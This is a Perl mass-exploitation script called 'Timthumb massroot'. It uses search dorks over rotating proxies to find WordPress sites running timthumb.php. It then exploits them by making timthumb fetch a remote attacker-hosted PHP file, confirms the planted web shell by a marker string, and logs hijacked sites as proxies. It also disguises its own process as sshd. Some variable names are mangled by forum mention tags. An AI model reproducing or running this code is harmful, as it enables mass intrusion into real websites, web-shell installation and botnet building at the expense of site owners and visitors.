#!/usr/bin/perl # MODULES #use strict; #use warnings; use IO::Socket; #use IO::Socket::SSL; use URI::_foreign; use URI::_generic; use URI::_query; use URI::https; use URI; use LWP; use LWP::Simple; use LWP::UserAgent; use LWP::Protocol::http; use URI::http; # use MIME::Base64::Perl; use MIME::Base64; use HTTP::Cookies; use HTTP::Request::Common qw(POST); use HTTP::Headers; use HTML::Parser; use Parallel::ForkManager; use IO::Socket; use LWP::Simple; use LWP::UserAgent; use HTTP::Cookies; use HTTP::Request::Common qw(POST); use HTTP::Headers; use Getopt::Long; use Time::HiRes qw(gettimeofday); if (@ARGV == 0){&usage();} #my $url = "http://w...content-available-to-author-only...a.de/"; my $expl = "http://f...content-available-to-author-only...e.de/pictures.php"; my $injects = "injects"; my $pathfile="paths"; my $hostfile="words.txt"; my $maximumprocess="100"; our $self=$0; my $hiddenprocess='/usr/sbin/sshd'; $0="$hiddenprocess"."\0"x16;; GetOptions( 'h=s' => \$hostfile, 'l=s' => \$localfile, 't|threads=s' => \$maximumprocess, 'help' => \&usage, 'hide=s' => \$hiddenprocess, 'x' => \&start, ); sub usage { print (" [+]Timthumb massroot -h host file (default words.txt) -t|threads (default 100) -help u are looking at it -hide hidden process (default /usr/sbin/sshd) "); exit; } sub start { print "[" . scalar localtime(time) . "][STARTED MASS ROUTING WITH $maximumprocess THREADS]\n\n"; my $forkmanager = new Parallel::ForkManager($maximumprocess); open(my $hosth, "<" . $hostfile); while (<$hosth>) { my $host = $_; $host =~ s/\x0a//g; chomp($host); # print $host . "\n"; my $processid = $forkmanager->start() and next; &google2($host); $forkmanager->finish(); } close($hostfileh); $forkmanager->wait_all_children(); } #end start sub google2() { my @uagents = ("Microsoft Internet Explorer/4.0b1 (Windows 95)","Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)","Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)","Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)","Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)","Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)","Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)","Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)","Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)","Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)","Mozilla/4.0 (compatible; MSIE 7.0b; Win32)","Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)","Microsoft Pocket Internet Explorer/0.6","Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)","MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;","Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)","Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)","Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)","Advanced Browser (http://w...content-available-to-author-only...r.com)","Avant Browser (http://w...content-available-to-author-only...r.com)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)","Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)","Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)","Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007","Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511","Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929","Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0","Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox","Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4","Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6","Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7","Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4","Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4","Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1","Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1","Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1","Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1","Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2","Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b","Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0","Mozilla/3.0 (OS/2;U)","Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)","Mozilla/4.61 (Macintosh; I; PPC)","Mozilla/4.61 [en] (OS/2; U)","Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)","Mozilla/4.8 [en] (Windows NT 5.0; U)"); my $ua = LWP::UserAgent->new(agent => "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]", env_proxy => 1, keep_alive => 1,timeout => 15); #my [MENTION=57691]dom[/MENTION]s = ("mobi","info","net","ae","com.af","com.ag","off.ai","am","com.ar","as","at","com.au","az","ba","com.bd","be","bg","bi","com.bo","com.br","bs","co.bw","com.bz","ca","cd","cg","ch","ci","co.ck","cl","com.co","co.cr","com.cu","de","dj","dk","dm","com.do","com.ec","es","com.et","fi","com.fj","fm","fr","gg","com.gi","gl","gm","gr","com.gt","com.hk","hn","hr","co.hu","co.id","ie","co.il","co.im","co.in","is","it","co.je","com.jm","jo","co.jp","co.ke","kg","co.kr","kz","li","lk","co.ls","lt","lu","lv","com.ly","mn","ms","com.mt","mu","mw","com.mx","com.my","com.na","com.nf","com.ni","nl","no","com.np","nr","nu","co.nz","com.om","com.pa","com.pe","com.ph","com.pk","pl","pn","com.pr","pt","com.py","ro","ru","rw","com.sa","com.sb","sc","se","com.sg","sh","sk","sn","sm","com.sv","co.th","com.tj","tm","to","tp","com.tr","tt","com.tw","com.ua","co.ug","co.uk","com.uy","uz","com.vc","co.ve","vg","co.vi","com.vn","vu","ws","co.za","co.zm"); #my [MENTION=57691]dom[/MENTION]s = ("biz","cat","com","coop","info","int","jobs","mobi","museum","name","net","org","travel","ac","ad","ae","af","ag","ai","al","am","an","ao","aq","ar","as","at","au","aw","az","ba","bb","bd","be","bf","bg","bh","bi","bj","bm","bn","bo","br","bs","bt","bv","bw","by","bz","ca","cc","cd","cf","cg","ch","ci","ck","cl","cm","cn","co","cr","cs","cu","cv","cx","cy","cz","de","dj","dk","dm","do","dz","ec","ee","eg","eh","er","es","et","eu","fi","fj","fk","fm","fo","fr","ga","gb","gd","ge","gf","gg","gh","gi","gl","gm","gn","gp","gq","gr","gs","gt","gu","gw","gy","hk","hm","hn","hr","ht","hu","id","ie","il","im","in","io","iq","ir","is","it","je","jm","jo","jp","ke","kg","kh","ki","km","kn","kp","kr","kw","ky","kz","la","lb","lc","li","lk","lr","ls","lt","lu","lv","ly","ma","mc","md","mg","mh","mk","ml","mm","mn","mo","mp","mq","mr","ms","mt","mu","mv","mw","mx","my","mz","na","nc","ne","nf","ng","ni","nl","no","np","nr","nu","nz","om","pa","pe","pf","pg","ph","pk","pl","pm","pn","pr","ps","pt","pw","py","qa","re","ro","ru","rw","sa","sb","sc","sd","se","sg","sh","si","sj","sk","sl","sm","sn","so","sr","st","su","sv","sy","sz","tc","td","tf","tg","th","tj","tk","tm","tn","to","tp","tr","tt","tv","tw","tz","ua","ug","uk","um","us","uy","uz","va","vc","ve","vg","vi","vn","vu","wf","ws","ye","yt","yu","za","zm","zr","zw"); my $key=$_[0]; #my $path=$_[1]; my $counter=1; my $page=0; my $reqb; my $resb; my $random = int( rand(3)); my $flag; my [MENTION=65778]googled[/MENTION]; my $url; #foreach my $dom [MENTION=57691]dom[/MENTION]s) { # print $dom. " Scanned\n"; # for (my $i=0; $i<=20; $i+=10){ $uagent = $uagents[rand(scalar(@uagents))]; $ua = LWP::UserAgent->new(agent => $uagent); my $proxy = `perl -MList::Util -e 'print List::Util::shuffle <>' proxy.txt | tail -n 1`; chomp($proxy); # print $proxy . "\n"; my $url="http://a...content-available-to-author-only...s.com/ajax/services/search/images?v=1.0&start=1&rsz=large&q=timthumb.php%20site:" .$key; my $encoded = encode_base64($url,""); # print "Encoded url is " . $encoded . "\n"; sleep int(rand(5)); $url = $proxy . "?p=" . $encoded; # print "request made " . $url . "\n"; my $proxy; $reqb = HTTP::Request->new("GET", $url); $resb = $ua->request($reqb); my $join = join("",$resb->as_string); while($join=~m/unescapedUrl":"(.*?)"/g){ my $link=$1; if ($link=~m/(.*?)\/timthumb.php\?/){ my $direct=$1; $direct .= "/timthumb.php"; # &check2($direct); push [MENTION=65778]googled[/MENTION], $direct) } # print $link . "\n"; $link =~ s/\([-a-zA-Z0-9\.]+)\/\.*/\$1/\; $link .= "/"; push [MENTION=65778]googled[/\MENTION], $link); } #end while # } #end for # my $forkmanagerb = new Parallel::ForkManager(1); my %vhash = map { $_ => 1 } [MENTION=65778]googled[/MENTION]; my @vhostuniq = keys %vhash; print "[" . scalar localtime(time) . "][GOOGLE][Dork: " . $key ."][Domain: " .$key ."][Found: " . scalar @vhostuniq . "]\n"; foreach my $uni (@vhostuniq){ # my $processidb = $forkmanagerb->start() and next; # print $uni . "\n"; if ($uni=~m/timthumb.php/){ &check2($uni); } else { &extract($uni); } # $forkmanagerb->finish(); # $forkmanagerb->wait_all_children(); } [MENTION=65778]googled[/MENTION]=(); # } #end foreach } #end sub sub extract() { my $url = $_[0]; my $ua = LWP::UserAgent->new(agent => "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]", env_proxy => 1, keep_alive => 1,timeout => 20); my $req = HTTP::Request->new("GET", $url); my $res = $ua->request($req); my $join = join("",$res->as_string); if ($join =~m/wp-content/){ while (my $link=$join=~ m,(http.*?://([^\s)\"](?!ttp:))+),g) { my $link = $&; #print $link . "\n"; if ($link =~ m,/wp-content/themes/,g){ $link =~ m,(.*?)/wp-content/themes/(.*?)/,; my $site = $1; my $theme = $2; $link = $site . "/wp-content/themes/" . $theme . "/"; #print $link . "\n"; chomp($link); push (@links, $link) } if ($link =~ m,/wp-content/plugins/,g){ $link =~ m,(.*?)/wp-content/plugins/(.*?)/,; my $site = $1; my $plugin = $2; $link = $site . "/wp-content/plugins/" . $plugin . "/"; chomp($link); #print $link . "\n"; push (@links, $link) } } #end while extract } #end if my [MENTION=83868]Uni[/MENTION] = &clean(@links); foreach my $uni [MENTION=83868]Uni[/MENTION]) { #print $uni . "\n"; &check($uni); } } # end sub extract sub clean() { my [MENTION=2441]cln[/MENTION] = (); my %visit = (); foreach my $element (@_) { # $element =~ s/+/\//g; next if $visit{$element}++; push [MENTION=2441]cln[/MENTION], $element; } return [MENTION=2441]cln[/MENTION]; } # end sub clean sub check() { my $attack = $_[0]; #print "Atacking " . $attack . "\n"; open(my $injectfileh, "<" . $injects); while(<$injectfileh>){ my $inject = $_; $inject =~ s/\x0a//g; chomp($inject); my $exploit = $attack . $inject . "?src=" . $expl; my $uae = LWP::UserAgent->new(agent => "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]", env_proxy => 1, keep_alive => 1,timeout => 20); my $reqe = HTTP::Request->new("GET", $exploit); my $rese = $uae->request($reqe); my $output = join("",$rese->as_string); #print $exploit . "\n"; #print $rese->as_string; if ($output =~ m/Unable to open image/){ $output =~ m,Unable to open image : (.*?).php,g; my $shellpath=$1; #print $shellpath . "\n"; $shellpath =~ m,/wp-content(.*),; my $path =$1; my $rooturl = $attack =~ m,(.*)/wp-content,; $rooturl=$1; #print $rooturl . "\n"; my $checkurl = $rooturl . "/wp-content/" .$path. ".php"; &vuln($checkurl); } } # end while } #end sub check sub check2() { my $attack2 = $_[0]; #print "Atacking " . $attack2 . "\n"; my $exploit = $attack2 . "?src=" . $expl; my $uae = LWP::UserAgent->new(agent => "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]", env_proxy => 1, keep_alive => 1,timeout => 20); my $reqe = HTTP::Request->new("GET", $exploit); my $rese = $uae->request($reqe); my $output = join("",$rese->as_string); #print $exploit . "\n"; #print $rese->as_string; if ($output =~ m/Unable to open image/){ $output =~ m,Unable to open image : (.*?).php,g; my $shellpath=$1; #print $shellpath . "\n"; $shellpath =~ m,/wp-content(.*),; my $path =$1; my $rooturl = $attack2 =~ m,(.*)/wp-content,; $rooturl=$1; #print $rooturl . "\n"; my $checkurl = $rooturl . "/wp-content/" .$path. ".php"; &vuln($checkurl); } } #end sub check2 sub vuln { my $vulnurl = $_[0]; my $uae = LWP::UserAgent->new(agent => "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]", env_proxy => 1, keep_alive => 1,timeout => 20); my $reqe = HTTP::Request->new("GET", $vulnurl); my $rese = $uae->request($reqe); my $output = join("",$rese->as_string); if ($output =~ m/linkirc - jambihackerlink/i){ #print $vulnurl ." is vuln \n"; print "[" . scalar localtime(time) . "][VULN][" .$vulnurl ."]\n"; open(OUT, ">>vuln.txt" ); print OUT $vulnurl . "\n"; close OUT; open(OUT, ">>proxy.txt" ); print OUT $vulnurl . "\n"; close OUT; #my $boturl= $vulnurl . "?bot"; #my $reqe = HTTP::Request->new("GET", $boturl); #my $rese = $uae->request($reqe); #print "bot executed for ". $vulnurl . "\n"; } } #end sub vuln